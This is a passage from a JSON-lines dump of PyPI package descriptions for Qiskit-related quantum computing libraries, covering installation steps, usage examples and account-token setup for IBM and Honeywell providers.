please wait for a couple of daysInstall with PyPi (Windows, macOS)pip install qiskit-classroomwarningApple Silicon Processor not supported read this articleyou must install latex distribution(program).How to debug# download packagegithttps://github.com/KMU-quantum-classrooom/qiksit-classroom.git# install python packagescdqiskit-classroom\npipinstall-rrequirements.txt# run scriptspython-mmain.pyScreenShotsmain windowQuantum CircuitIt takes in the Python code and the names of the variables in the circuit you want to convert.\nThe Python code can be imported by dragging and dropping or by importing a file.MatrixTakes in a matrix written in Python syntax, the number of qubits, and whether the circuit is observed or not.Acknowledgement\uad6d\ubb38 : \"\ubcf8 \uc5f0\uad6c\ub294 2022\ub144 \uacfc\ud559\uae30\uc220\uc815\ubcf4\ud1b5\uc2e0\ubd80 \ubc0f \uc815\ubcf4\ud1b5\uc2e0\uae30\ud68d\ud3c9\uac00\uc6d0\uc758 SW\uc911\uc2ec\ub300\ud559\uc0ac\uc5c5\uc758 \uc5f0\uad6c\uacb0\uacfc\ub85c \uc218\ud589\ub418\uc5c8\uc74c\"(2022-0-00964)English : \"This research was supported by the MIST(Ministry of Science, ICT), Korea, under the National Program for Excellence in SW), supervised by the IITP(Institute of Information & communications Technology Planning & Evaluation) in 2022\"(2022-0-00964)LicenseQiskit-Classroom is licensed under the Apache License, Version 2.0"} +{"package": "qiskit-classroom-converter", "pacakge-description": "qiskit-classroom-converterQiskit classroom ConverterDocumentshttps://kmu-quantum-classroom.github.io/qiskit-classroom-converter/qiskit_class_converter.htmlOfficial USER Guidehttps://kmu-quantum-classroom.github.io/documents/overview.htmlSupport convert methodquantum circuit to bra-ket notationquantum circuit to matrixmatrix to quantum circuitstring to bra-ket notationOptionsconvert methodoptionQC_TO_BRA_KETexpression{simplify, expand}, print{raw}QC_TO_MATRIXprint{raw}MATRIX_TO_QClabel{str}STR_TO_BRA_KETprint{raw}fromqiskit_class_converterimportConversionServiceConversionService(conversion_type=\"QC_TO_BRA_KET\",option={\"expression\":\"simplify\"})Required dataMATRIX_TO_QCUser's QuantumCircuit objectfromqiskitimportQuantumCircuitfromqiskit_class_converterimportConversionServiceinput_value=[[1,0,0,0],[0,0,0,1],[0,0,1,0],[0,1,0,0]]sample_converter=ConversionService(conversion_type=\"MATRIX_TO_QC\")result=sample_converter.convert(input_value=input_value)# using user's QuantumCircuit objectquantum_circuit=QuantumCircuit(2,2)quantum_circuit.append(result,[0,1])How to Installpipinstallqiskit-classroom-converterDocker Pull & RunAlternative installation with docker image.dockerpullghcr.io/kmu-quantum-classroom/qiskit-classroom-converter\ndockerrun-p8888:8888ghcr.io/kmu-quantum-classroom/qiskit-classroom-converterDependenciesqiskitUsagefromqiskitimportQuantumCircuitfromqiskit_class_converterimportConversionService# quantum circuit to matrixquantum_circuit=QuantumCircuit(2,2)quantum_circuit.x(0)quantum_circuit.cx(0,1)sample_converter=ConversionService(conversion_type=\"QC_TO_MATRIX\")result=sample_converter.convert(input_value=quantum_circuit)code :example.pyHow to test the softwarepython-munittest-vortoxARM PlatformMac ARM chips users may have issues running this package.We have provided a Dockerfile, which can be used docker-compose.docker-composeup--buildAcknowledgement\uad6d\ubb38 : \"\ubcf8 \uc5f0\uad6c\ub294 2022\ub144 \uacfc\ud559\uae30\uc220\uc815\ubcf4\ud1b5\uc2e0\ubd80 \ubc0f \uc815\ubcf4\ud1b5\uc2e0\uae30\ud68d\ud3c9\uac00\uc6d0\uc758 
SW\uc911\uc2ec\ub300\ud559\uc0ac\uc5c5\uc758 \uc5f0\uad6c\uacb0\uacfc\ub85c \uc218\ud589\ub418\uc5c8\uc74c\"(2022-0-00964)English : \"This research was supported by the MIST(Ministry of Science, ICT), Korea, under the National Program for Excellence in SW), supervised by the IITP(Institute of Information & communications Technology Planning & Evaluation) in 2022\"(2022-0-00964)"} +{"package": "qiskit-cold-atom", "pacakge-description": "Qiskit cold atom is an open-source library to describe cold atomic quantum\nexperiments in a gate- and circuit-based framework."} +{"package": "qiskit-debugger", "pacakge-description": "Breakpoint Debugging on a Physical Qunatum CircuitProblem DescriptionIn classical computing, debugging with breakpoint means halting the program\nexecution at any given point and freezing the program state. This allows\nprogrammers to examine the program internals mid-execution (as in, what\nvariables contain which values, analyze control flow etc.) Unfortunately, in\nquantum computing, doing this is not possible. Qubits in a quantum circuit have\nprobabilistic values (in superposition), and the act of measuring collapses the\nqubits to a deterministic state.Breakpoint debugging is still needed for quantum computing, so our problem boils\ndown to measuring at the breakpoint and preserving enough information to\n\u201crecreate\u201d that state and continue execution from that point.Group MembersPalvit Garg (pgarg5)Harshwardhan Joshi (hjoshi2)Shawn Salekin (ssaleki)PresentationURLQuickstartInstall with pippip install qiskit_debuggerImport the following the classes to experiment with the debugger like this:from qiskit_debugger import QuantumDebugCircuit, QCDebugger, run_circuitA motivating example of how to use the debugger classes:qc = QuantumDebugCircuit(2)\nqc.x(0)\nqc.h(range(2))\nqc.cx(0, 1)\nqc.h(range(2))\nqc.bp() # <-- Add a breakpoint here\nqc.h(range(2))\nqc.x(range(2))\nqc.bp() # <-- Add a breakpoint here\nqc.cx(1, 0)\nqc.h(range(2))\nqc.bp()\n\nqc.draw()\n\n# run each breakpoints\nqdb = QCDebugger(qc)\nqdb.c()\nqdb.c()\nqdb.c()\nqdb.c()Run the circuit as a whole w/o debuggerqc.measure_all()\nresult = run_circuit(qc)\nprint(result.get_counts())If you want to use hardware you have to initiate theQCDebuggerlike so:from qiskit import IBMQ\n\n# loading IBMQ account\nIBMQ.load_account()\nprovider = IBMQ.get_provider(hub='ibm-q-ncsu', group='nc-state', project='grad-qc-class')\n# This is important, fill up the hw_backend variable like this.\nhw_backend = provider.get_backend('ibm_oslo')\n\nqdb = QCDebugger(qc, use_hardware=True)Solution ApproachesLet\u2019s assume we have a circuit with multiple qubits, and it has a breakpoint\nbrk. The circuit before the breakpoint is called A, and after is called B. The\ntarget is to measure the state of qubits at point brk.To \u201crecreate\u201d, i.e., synthesize an equivalent circuit right after it is\nmeasured, we thought of two possible methods.1.Approach 1:\nWe make two circuits of varying length: one ends at the breakpoint, and the\nother stops at the original end without stopping at the breakpoint. Then we run\nboth of these circuits.(update 11/05/22): since this is a trivial and inefficient implementation, we\nwill focus our attention to approach 2.Approach 2:\nCreate a custom gate using the unitary matrix that results from running circuit\npart A, save it somewhere. 
Then create a custom gate using the saved unitary\nmatrix to circuit part B.This custom gate is equivalent to the circuit part A.\nNow run this custom gate and then part B.Final ResultWe have successfully implemented the first approach which uses a combination of simulation and hardware.\nUsing unitary matrices from unitary simulator runs and actual output from hardware runs,\nwe were able to correctly re-create the qubit states pre-measurement, and were able to successfully\nresume the circuit after the breakpoint. Our implementation is readily usable as well. Our expectation with limited erorr propagation with this approach is alsoverified. This approach can aid the quantum computing programmers in interacting with\nand debugging their code in a more effective way, as long as the circuit width isn't too big.On the other hand, we found that the pure hardware approach is cumbersome and expensive to implement. The key driver behind\nthis approach is Quantum Phase Estimation, and while there are a number of algorithms uses this sub-routine, in\npractice it is a) not very precise, b) hard to implement, and c) limits the number of breakpoints to a handful\ndue to error propagation.Open ProblemsImplement a comprehensive test suite for the debugger implmentationWork out a way to extend the QPE and the hardware approach to extend to 2-,3-, and more qubit circuitsContributions During the Final RoundResearch and experiments with pure hawrdware approach - PalvitExperiments and implementation with simulator approach - ShawnBenchmakring, experiments, and final reports - HarshProgress Made (Round 2)Synthesized a new circuit based on a unitary matrix and run it on a real\nhardware.Assessed the importance of phase date in synthesizing a circuit from breakpointInvestigated different methods of generating unitary matricesTimeline (Detailed & Revised)Confirm whether and under what condition we can generate a unitary from a\nhardware run (11/12/2022)Decide whether to use simulation or hardware based on the outcome of\ngenerating unitary from the hardware runs (11/12/2022)Validate whether the phase data obtained from simulation(s) can be used in\nsynthesizing an equivalent circuit after a breakpointFigure out a method to extract phase data from parallel simulation runs (11/19/2022)Implement a qiskit module/extension that would allow qiskit users to add\nbreakpoint(s) to their circuit.(11/26/2022)Add tests and run a number of experiments to validate the correctness of our\nimplementation.(11/26/2022)Project Timeline (Original)11/01/2022: Implement approach 111/10/2022: Analyze the feasibility of implementing approach 2.11/26/2022: Implement approach 2 (or a better one)Future Readingshttps://dl.acm.org/doi/abs/10.1145/3373376.3378488https://arxiv.org/pdf/2103.09172.pdfReferenceshttps://qiskit.org/documentation/tutorials/circuits_advanced/02_operators_overview.htmlhttps://qiskit.org/documentation/stubs/qiskit.converters.circuit_to_instruction.htmlhttps://github.ncsu.edu/fmuelle/qc19/tree/master/hw/hw6/m3/csc591-quantum-debugginghttps://quantumcomputing.stackexchange.com/questions/27064/how-to-get-statevector-of-qubits-after-running-quantum-circuits-on-ibmq-real-har"} +{"package": "qiskit-dell-runtime", "pacakge-description": "Qiskit Dell RuntimeQiskit Dell Runtime is aQiskit Runtimeplatform that can execute classical-quantum code on both local and on-premise environments. With this platform, hybrid classical-quantum code bundle can be developed and executed. 
Powered by Qiskit Runtime API, this execution model provides close-integration of classical and quantum execution.Various simulation, emulation and quantum hardware can be integrated with this platform. Developers can abstract their source code with Qiskit, so that execution can be ported across execution environments with minimum effort.At this time the Qiskit-Dell-Runtime has been tested on Linux and Windows.Getting Started with QiskitThe Qiskit Dell Runtime is an platform for running hybrid classical-quantum algorithms in local and remote execution environments. To get started using the platform, it is recommended that you have some experience with Qiskit first.You can find plenty of tutorials and introductory materials provided by Qiskithere.ArchitectureThis platform provides both client-side provider and server-side components.Client-side ProviderUsers would need to install theDellRuntimeProvideron client devices. The provider is defaulted to local execution and can be used out of the box. This provider can also be used to connect with platform running on a server-side, so that users can control server and execute jobs by using the same API.Server-side ComponentsThis platform has a minimalist design to create a light-weighted execution environment for server-side components. It contains anorchestratorlong-running microservice that listens to requests fromDellRuntimeProvider.At runtime, when a job is started by user, a new pod will be created to execute both classical and vQPU workload.For deployment installation, please visit thislink.Database ConfigurationAll user-uploaded code and execution parameters will be stored in a database. By default, this platform comes with amysqldeployment. If users would like to customize database to another database service, please view these installations for database configuration.SSOSSO integration is off by default, so that users can easily set up a sandbox environment. There is existing integration hooks built into the platform for easy integration with various SSO systems.Multi-Backend SupportBy default, the quantum execution will be processed byQiskit Aersimulation engine. Users can modify the quantum backend by specifyingbackend-namein the job input parameter. Custom code adjustment can be made to support multipleQiskit backends, including other emulation, simulation and QPU backends.Emulation vs SimulationWhile simulation engines execute quantum circuits to measure probablistic outcome, emulation engines calculate outcome for algorithms with deterministic calculations.The Hybrid Emulation Platform can support both simulation and emulation,depending on the backend used.You can read about the VQE example provided inour documentationor in aQiskit Tutorialif you want to learn more about when it may be beneficial to use either emulation or simulation over the other.Emulations for different use cases are under-development, and we are looking for feedback to better prioritize on use cases. 
If you have a use-case in mind, please contact us atv.fong@dell.com.Documentation Links:IntroductionInstallation GuideRequirementsClient Quick Start GuideServer Quick Start GuideConfiguring Custom SSOConfiguring Custom DatabaseUsageLocal Execution SetupRemote Execution SetupProgram UploadExecutionObtaining Results(Optional) Callback Function(Optional) Backend SelectionExamplesLocal ExecutionRemote ExecutionQKAVQEFor any questions or feedback, please contactv.fong@dell.com"} +{"package": "qiskit-dynamics", "pacakge-description": "Qiskit DynamicsThis repo is still in the early stages of development, there will be breaking API changesQiskit Dynamics is an open-source project for building, transforming, and solving time-dependent\nquantum systems in Qiskit.The goal of Qiskit Dynamics is to provide access to different numerical methods for solving\ndifferential equations, and to automate common processes typically performed by hand, e.g. applying\nframe transformations or rotating wave approximations to system and control Hamiltonians.Qiskit Dynamics can be configured to use eitherNumPyorJAXas the backend for array operations.NumPyis the default, andJAXis\nan optional dependency.JAXprovides just-in-time compilation,\nautomatic differentiation, and GPU execution, and therefore is well-suited to tasks involving\nrepeated evaluation of functions with different parameters; E.g. simulating a model of a quantum\nsystem over a range of parameter values, or optimizing the parameters of control sequence.Reference documentation may be foundhere, includingtutorials,user guide,API reference, andDiscussions.InstallationQiskit Dynamics may be installed using pip via:pip install qiskit-dynamicsAdditionally, Qiskit Dynamics may be installed simultaneously with the CPU version of\nJAX via:pip install \"qiskit-dynamics[jax]\"Installing JAX with GPU support must be done manually, for instructions refer to theJAX installation guide.Contribution GuidelinesIf you'd like to contribute to Qiskit Dynamics, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking\nrequests and bugs. Pleasejoin the Qiskit Slack communityand use our#qiskit-dynamicschannel for discussion and simple\nquestions. For questions that are more suited for a forum we use the Qiskit tag in theStack Exchange.Authors and CitationQiskit Dynamics is the work ofmany peoplewho\ncontribute to the project at different levels. If you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-experiments", "pacakge-description": "Qiskit ExperimentsQiskit Experimentsis a repository that builds tools for building, running,\nand analyzing experiments on noisy quantum computers using Qiskit.To learn more about the package, you can see themost up-to-date documentationcorresponding to the main branch of this repository or thedocumentation for the latest stable release.Contribution GuidelinesIf you'd like to contribute to Qiskit Experiments, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expected to\nuphold this code.We useGitHub issuesfor\ntracking requests and bugs. 
Pleasejoin the Qiskit Slack communityand use the#experimentschannel for discussion and\nsimple questions.\nFor questions that are more suited for a forum we use the Qiskit tag inStack Exchange.Authors and CitationQiskit Experiments is the work ofmany peoplewho contribute\nto the project at different levels. If you use Qiskit Experiments, please cite ourpaperas per the includedcitation file.LicenseApache License 2.0"} +{"package": "qiskit-finance", "pacakge-description": "Qiskit FinanceQiskit Financeis an open-source framework that contains uncertainty components for stock/securities problems,\napplications, such as portfolio optimization, and data providers to source real or random data to\nfinance experiments.InstallationWe encourage installing Qiskit Finance via the pip tool (a python package manager).pipinstallqiskit-financepipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Finance, then you can install from source.\nTo do this follow the instructions in thedocumentation.Creating Your First Finance Programming Experiment in QiskitNow that Qiskit Finance is installed, it's time to begin working with the finance module.\nLet's try an experiment using Amplitude Estimation algorithm to\nevaluate a fixed income asset with uncertain interest rates.importnumpyasnpfromqiskit.primitivesimportSamplerfromqiskit_algorithmsimportAmplitudeEstimationfromqiskit_finance.circuit.libraryimportNormalDistributionfromqiskit_finance.applicationsimportFixedIncomePricing# Create a suitable multivariate distributionnum_qubits=[2,2]bounds=[(0,0.12),(0,0.24)]mvnd=NormalDistribution(num_qubits,mu=[0.12,0.24],sigma=0.01*np.eye(2),bounds=bounds)# Create fixed income componentfixed_income=FixedIncomePricing(num_qubits,np.eye(2),np.zeros(2),cash_flow=[1.0,2.0],rescaling_factor=0.125,bounds=bounds,uncertainty_model=mvnd,)# the FixedIncomeExpectedValue provides us with the necessary rescalings# create the A operator for amplitude estimationproblem=fixed_income.to_estimation_problem()# Set number of evaluation qubits (samples)num_eval_qubits=5# Construct and run amplitude estimationsampler=Sampler()algo=AmplitudeEstimation(num_eval_qubits=num_eval_qubits,sampler=sampler)result=algo.estimate(problem)print(f\"Estimated value:\\t{fixed_income.interpret(result):.4f}\")print(f\"Probability:\\t{result.max_probability:.4f}\")When running the above the estimated value result should be 2.46 and probability 0.8487.Further examplesLearning path notebooks may be found in thefinance tutorialssection\nof the documentation and are a great place to start.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines.\nThis project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. 
Pleasejoin the Qiskit Slack communityand for discussion and simple questions.\nFor questions that are more suited for a forum, we use theQiskittag inStack Overflow.Authors and CitationFinance was inspired, authored and brought about by the collective work of a team of researchers.\nFinance continues to grow with the help and work ofmany people, who contribute\nto the project at different levels.\nIf you use Qiskit, please cite as per the providedBibTeX file.LicenseThis project uses theApache License 2.0."} +{"package": "qiskitflow", "pacakge-description": "QiskitFlow. Reproducible quantum experiments.Platform for tracking, sharing and running quantum experiments in a clean and understandable for developers, researchers and students manner.Alpha release is in the works.\nFiles from hackathon project are located inhackathon folderGeneral overviewHot to runOverview / FlowInstallationCode annotationCLIExperiment runs listExperiment run informationShare experimentExamplesRun server and UI on your machineUIFlowFlow of actions while using QiskitFlow is following:InstallQiskitFlow if not installed yetAnnotateyour code withExperimentabstraction QiskitFlow library providesRun your code as usual: QiskitFlow will write metadata of your experiment execution in local folderYou can review experiments usingCLI interfaceWe are tracking metrics, parameters, state vectors and counts of experiments.\nArtifacts, circuits, sourcecode and other useful things are on their way.Note: qiskitflow creates_experimentsfolder in place of execution of code, where all serialized information is stored in json format, so it's easy to track it even in gitInstallationpipinstallqiskitflowCode annotationLibrary for quantum programs annotationSample example of annotation:fromqiskitflowimportExperimentwithExperiment(\"awesome_experiment\")asexperiment:# your quantum program here!experiment.write_metric(\"test metric\",0.1)experiment.write_metric(\"test metric 2\",2)experiment.write_parameter(\"test parameter\",\"test parameter value\")experiment.write_parameter(\"test parameter 2\",\"test paraeter value 2\")experiment.write_counts(\"measurement\",{\"00\":1024,\"11\":0})Full example with quantum teleportationimportnumpyasnpimporttimefromqiskitimportQuantumCircuit,QuantumRegister,ClassicalRegister,execute,BasicAer,IBMQfromqiskit.visualizationimportplot_histogram,plot_bloch_multivectorfromqiskit.extensionsimportInitializefromqiskit_textbook.toolsimportrandom_state,array_to_latexfromqiskitflowimportExperimentwithExperiment(\"quantum teleportation\")asexperiment:start_time=time.time()# conduct experiment as usualpsi=random_state(1)init_gate=Initialize(psi)init_gate.label=\"init\"inverse_init_gate=init_gate.gates_to_uncompute()qr=QuantumRegister(3,name=\"q\")crz=ClassicalRegister(1,name=\"crz\")crx=ClassicalRegister(1,name=\"crx\")qc=QuantumCircuit(qr,crz,crx)qc.append(init_gate,[0])qc.barrier()create_bell_pair(qc,1,2)qc.barrier()alice_gates(qc,0,1)measure_and_send(qc,0,1)bob_gates(qc,2,crz,crx)qc.append(inverse_init_gate,[2])cr_result=ClassicalRegister(1)qc.add_register(cr_result)qc.measure(2,2)backend_name=\"qasm_simulator\"backend=BasicAer.get_backend(backend_name)counts=execute(qc,backend,shots=1024).result().get_counts()end_time=time.time()runtime=end_time-start_time# qiskitflow =========# log parameters usedexperiment.write_parameter(\"backend name\",backend_name)# log metrics of experimentexperiment.write_metric(\"runtime\",runtime)# log counts of experimentexperiment.write_counts(\"experiment counts\",counts)CLIList of 
experiment runsqiskitflowruns[--search=][--experiment=][--order_by=][--order_type=]experiments list screenshotExperiment run informationqiskitflowrunexperiment information screenshotsExperiment informationShare experiment runqiskitflowshare--user=--password=--host=--port=Example for local backend serverqiskitflowshare86b6e7ba32f04d34b842a91079482454--user=--password=--host=http://localhost--port=8000experiment share screenshotsExperiment informationExamplesJupyter notebook with quantum teleportation exampleRun localInstalldocker composeRundocker-composeupUIScreenshotsExperiment information"} +{"package": "qiskit-han", "pacakge-description": "A Quantum backend provider"} +{"package": "qiskit-hangyul", "pacakge-description": "A Quantum backend provider"} +{"package": "qiskit-honeywell-provider", "pacakge-description": "Qiskit Honeywell ProviderQiskitis an open-source framework for working with noisy quantum computers at the level of pulses, circuits, and algorithms.This project contains a provider that allows access to Honeywell quantum\ndevices.InstallationYou can install the provider using pip:pip3installqiskit-honeywell-providerpipwill handle installing all the python dependencies automatically and you\nwill always install the latest version.Setting up the Honeywell ProviderOnce the package is installed, you can access the provider from Qiskit via the following import:fromqiskit.providers.honeywellimportHoneywellYou will need credentials for the Honeywell Quantum Service. Credentials are\ntied to an e-mail address that can be stored on disk with:Honeywell.save_account('username@company.com')After the initial saving of your account information, you will be prompted to enter\nyour password which will be used to acquire a token that will enable continuous\ninteraction until it expires. Your password willnotbe saved to disk and will\nbe required infrequently to update the credentials stored on disk or when a new\nmachine must be authenticated.The credentials will then be loaded automatically on calls that return Backends,\nor can be manually loaded with:Honeywell.load_account()This will load the most recently saved credentials from disk so that they can be provided\nfor each interaction with Honeywell's devices.Storing a new account willnotinvalidate your other stored credentials. You may have an arbitrary\nnumber of credentials saved. To delete credentials you can use:Honeywell.delete_credentials()Which will delete the current accounts credentials from the credential store. Please keep in mind\nthis only deletes the current accounts credentials, and not all credentials stored.With credentials loaded you can access the backends from the provider:backends=Honeywell.backends()backend=Honeywell.get_backend(device)You can then use that backend like you would use any other qiskit backend. For\nexample, running a bell state circuit:fromqiskitimport*qc=QuantumCircuit(2,2)qc.h(0)qc.cx(0,1)qc.measure([0,1],[0,1])result=execute(qc,backend).result()print(result.get_counts(qc))Using a proxyTo configure a proxy include it in the save account configuration:Honeywell.save_account('username@company.com',proxies={'urls':{'http':'http://user:password@myproxy:8080','https':'http://user:password@myproxy:8080'}})To remove the proxy you can save with an empty dictionary:Honeywell.save_account('username@company.com',proxies={})The 'urls' field must be a dictionary that maps a protocol type or url to a specific proxy. 
Additional information/details can be foundhere.LicenseApache License 2.0."} +{"package": "qiskit-ibm-experiment", "pacakge-description": "Qiskit IBM Experiment serviceQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a service that allows accessing theIBM Quantumexperiment database.InstallationThe provider can be installed via pip:pipinstallqiskit-ibm-experimentProvider SetupCreate an IBM Quantum account or log in to your existing account by visiting theIBM Quantum login page.Ensure you have access to the experiment database.Copy (and/or optionally regenerate) your API token from yourIBM Quantum account page.Take your token from step 2, here calledMY_API_TOKEN, and save it by callingIBMExperimentService.save_account():fromqiskit_ibm_experimentimportIBMExperimentServiceIBMExperimentService.save_account(token='MY_API_TOKEN')The command above stores your credentials locally in a configuration file calledqiskit-ibm.json. By default, this file is located in$HOME/.qiskit, where$HOMEis your home directory.Once saved you can then instantiate the experiment service without using the API token:fromqiskit_ibm_experimentimportIBMExperimentServiceservice=IBMExperimentService()# display current supported backendsprint(service.backends())# get the latest experiments in the DBexperiment_list=service.experiments()You can also save specific configuration under a given name:fromqiskit_ibm_experimentimportIBMExperimentServiceIBMExperimentService.save_account(name='my_config',token='MY_API_TOKEN')And explicitly load it:fromqiskit_ibm_experimentimportIBMExperimentServiceservice=IBMExperimentService(name='my_config')# display current supported backendsprint(service.backends())Load Account from Environment VariablesAlternatively, the IBM Provider can discover credentials from environment variables:exportQISKIT_IBM_EXPERIMENT_TOKEN='MY_API_TOKEN'exportQISKIT_IBM_EXPERIMENT_URL='https://auth.quantum-computing.ibm.com/api'Then instantiate the provider without any arguments and access the backends:fromqiskit_ibm_experimentimportIBMExperimentServiceservice=IBMExperimentService()Environment variable take precedence over the default account saved to disk viasave_account,\nif one exists; but if thenameparameter is given, the environment variables are ignored.Enable Account for Current SessionAs another alternative, you can also enable an account just for the current session by instantiating the service with the tokenfromqiskit_ibm_experimentimportIBMExperimentServiceservice=IBMExperimentService(token='MY_API_TOKEN')Contribution GuidelinesIf you'd like to contribute to IBM Quantum Experiment Service, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct.\nBy participating, you are expect to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use the\ninvite link atQiskit.org. For questions that are more suited for a forum we\nuse theQiskittag inStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from ourQiskit Tutorialrepository.Authors and CitationThe Qiskit IBM Quantum Experiment Service is the work ofmany peoplewho contribute to the\nproject at different levels. 
If you use Qiskit, please cite as per the included BibTeX file. License: Apache License 2.0."} +{"package": "qiskit-ibm-provider", "pacakge-description": "Qiskit IBM Quantum Provider. Qiskit is an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules. This project contains a provider that allows accessing the IBM Quantum systems and simulators. Migrating from qiskit-ibmq-provider: If you are familiar with the qiskit-ibmq-provider repository, check out the migration guide. Installation: You can install the provider using pip:
pip install qiskit-ibm-provider
Provider Setup: Create an IBM Quantum account or log in to your existing account by visiting the IBM Quantum login page. Copy (and/or optionally regenerate) your API token from your IBM Quantum account page. Take your token from step 2, here called MY_API_TOKEN, and save it by calling IBMProvider.save_account():
from qiskit_ibm_provider import IBMProvider
IBMProvider.save_account(token='MY_API_TOKEN')
The command above stores your credentials locally in a configuration file called qiskit-ibm.json. By default, this file is located in $HOME/.qiskit, where $HOME is your home directory. Once saved, you can then instantiate the provider as below and access the backends:
from qiskit_ibm_provider import IBMProvider
provider = IBMProvider()
# display currently supported backends
print(provider.backends())
# get IBM's simulator backend
simulator_backend = provider.get_backend('ibmq_qasm_simulator')
Load Account from Environment Variables: Alternatively, the IBM Provider can discover credentials from environment variables:
export QISKIT_IBM_TOKEN='MY_API_TOKEN'
Then instantiate the provider without any arguments and access the backends:
from qiskit_ibm_provider import IBMProvider
provider = IBMProvider()
Enable Account for Current Session: As another alternative, you can also enable an account just for the current session by instantiating the provider with the token.
from qiskit_ibm_provider import IBMProvider
provider = IBMProvider(token='MY_API_TOKEN')
Next Steps: Now you're set up and ready to check out some of the tutorials: IBM Quantum Learning, Qiskit. Contribution Guidelines: If you'd like to contribute to qiskit-ibm-provider, please take a look at our contribution guidelines. This project adheres to Qiskit's code of conduct. By participating, you are expected to uphold this code. We use GitHub issues for tracking requests and bugs. Please use our slack for discussion and simple questions. To join our Slack community, use the invite link here. Authors and Citation: The Qiskit IBM Quantum Provider is the work of many people who contribute to the project at different levels. If you use Qiskit, please cite as per the included BibTeX file. License: Apache License 2.0."} +{"package": "qiskit-ibmq-provider", "pacakge-description": "Qiskit IBM Quantum Provider (NOW DEPRECATED). PLEASE NOTE: As of version 0.20.0, released in January 2023, qiskit-ibmq-provider has been deprecated, with its support ending and eventual archival being no sooner than 3 months from that date. The functionality provided by qiskit-ibmq-provider is not going away; rather, it has been split out into separate repositories. Please see the Migration Guides section below for more detail.
We encourage you\nto migrate over at your earliest convenience.Qiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This module contains a provider that allows accessing theIBM Quantumsystems and simulators.Migration GuidesAll the functionality thatqiskit-ibmq-providerprovides has been migrated to other packages:FormerlyCurrent packageDetailsMigration Guideqiskit.providers.ibmq.experimentqiskit-ibm-experiment(no docs yet)For the features related with the IBM Quantum experiment database service.guideqiskit.providers.ibmq.runtimeqiskit-ibm-runtime(docs)Use this package if you prefer getting high quality probability distribution or expectation values without having to optimize the circuits or mitigate results yourself.guideRest ofqiskit.providers.ibmqqiskit-ibm-provider(docs)Use this package if you need direct access to the backends to do experiments like device characterization.guideThese packages can be installed by themselves (via the standard pip install command, e.g.pip install qiskit-ibm-provider) and are not part of the Qiskit metapackage.InstallationWe encourage installing Qiskit via the PIP tool (a python package manager),\nwhich installs all Qiskit elements and components, including this one.pipinstallqiskitPIP will handle all dependencies automatically for us and you will always\ninstall the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Setting up the IBM Quantum ProviderOnce the package is installed, you can access the provider from Qiskit.Note: Since November 2019 (and with version0.4of thisqiskit-ibmq-providerpackage / version0.14of theqiskitpackage)\nlegacy Quantum Experience or QConsole (v1) accounts are no longer supported.\nIf you are still using a v1 account, please follow the steps described inupdate instructionsto update your account.Configure your IBM Quantum credentialsCreate an IBM Quantum account or log in to your existing account by visiting\ntheIBM Quantum login page.Copy (and/or optionally regenerate) your API token from yourIBM Quantum account page.Take your token from step 2, here calledMY_API_TOKEN, and run:fromqiskitimportIBMQIBMQ.save_account('MY_API_TOKEN')The command above stores your credentials locally in a configuration file calledqiskitrc.\nBy default, this file is located in$HOME/.qiskit, where$HOMEis your home directory. If\nyou are still usingQconfig.py, please delete that file and run the command above.Accessing your IBM Quantum backendsAfter callingIBMQ.save_account(), your credentials will be stored on disk.\nOnce they are stored, at any point in the future you can load and use them\nin your program simply via:fromqiskitimportIBMQprovider=IBMQ.load_account()backend=provider.get_backend('ibmq_qasm_simulator')Alternatively, if you do not want to save your credentials to disk and only\nintend to use them during the current session, you can use:fromqiskitimportIBMQprovider=IBMQ.enable_account('MY_API_TOKEN')backend=provider.get_backend('ibmq_qasm_simulator')By default, all IBM Quantum accounts have access to the same, open project\n(hub:ibm-q, group:open, project:main). For convenience, theIBMQ.load_account()andIBMQ.enable_account()methods will return a provider\nfor that project. 
If you have access to other projects, you can use:provider_2=IBMQ.get_provider(hub='MY_HUB',group='MY_GROUP',project='MY_PROJECT')Updating to the new IBM QuantumSince November 2019 (and with version0.4of thisqiskit-ibmq-providerpackage), the IBM Quantum Provider only supports the newIBM Quantum, dropping\nsupport for the legacy Quantum Experience and Qconsole accounts. The new IBM Quantum is also referred asv2, whereas the legacy one and Qconsole asv1.This section includes instructions for updating your accounts and programs.\nPlease note that:the IBM Quantum Experiencev1credentials and the programs written for pre-0.3\nversions will still be working during the0.3.xseries. From 0.4 onwards,\nonlyv2credentials are supported, and it is recommended to upgrade\nin order to take advantage of the new features.updating your credentials to the IBM Quantumv2implies that you\nwill need to update your programs. The sections below contain instructions\non how to perform the transition.Updating your IBM Quantum credentialsIf you have credentials for the legacy Quantum Experience or Qconsole stored in\ndisk, you can make use ofIBMQ.update_account()helper. This helper will read\nyour current credentials stored in disk and attempt to convert them:fromqiskitimportIBMQIBMQ.update_account()Found 2 credentials.\nThe credentials stored will be replaced with a single entry with token \"MYTOKEN\"\nand the new IBM Quantum v2 URL (https://auth.quantum-computing.ibm.com/api).\n\nIn order to access the provider, please use the new \"IBMQ.get_provider()\" methods:\n\n provider0 = IBMQ.load_account()\n provider1 = IBMQ.get_provider(hub='A', group='B', project='C')\n\nNote you need to update your programs in order to retrieve backends from a\nspecific provider directly:\n\n backends = provider0.backends()\n backend = provider0.get_backend('ibmq_qasm_simulator')\n\nUpdate the credentials? [y/N]Upon confirmation, your credentials will be overwritten with a valid IBM Quantum\nv2 set of credentials. For more complex cases, consider deleting your\nprevious credentials viaIBMQ.delete_accounts()and follow the instructions\nin theIBM Quantum account page.Updating your programsThe new IBM Quantum support also introduces a more structured approach for accessing backends.\nPreviously, access to all backends was centralized 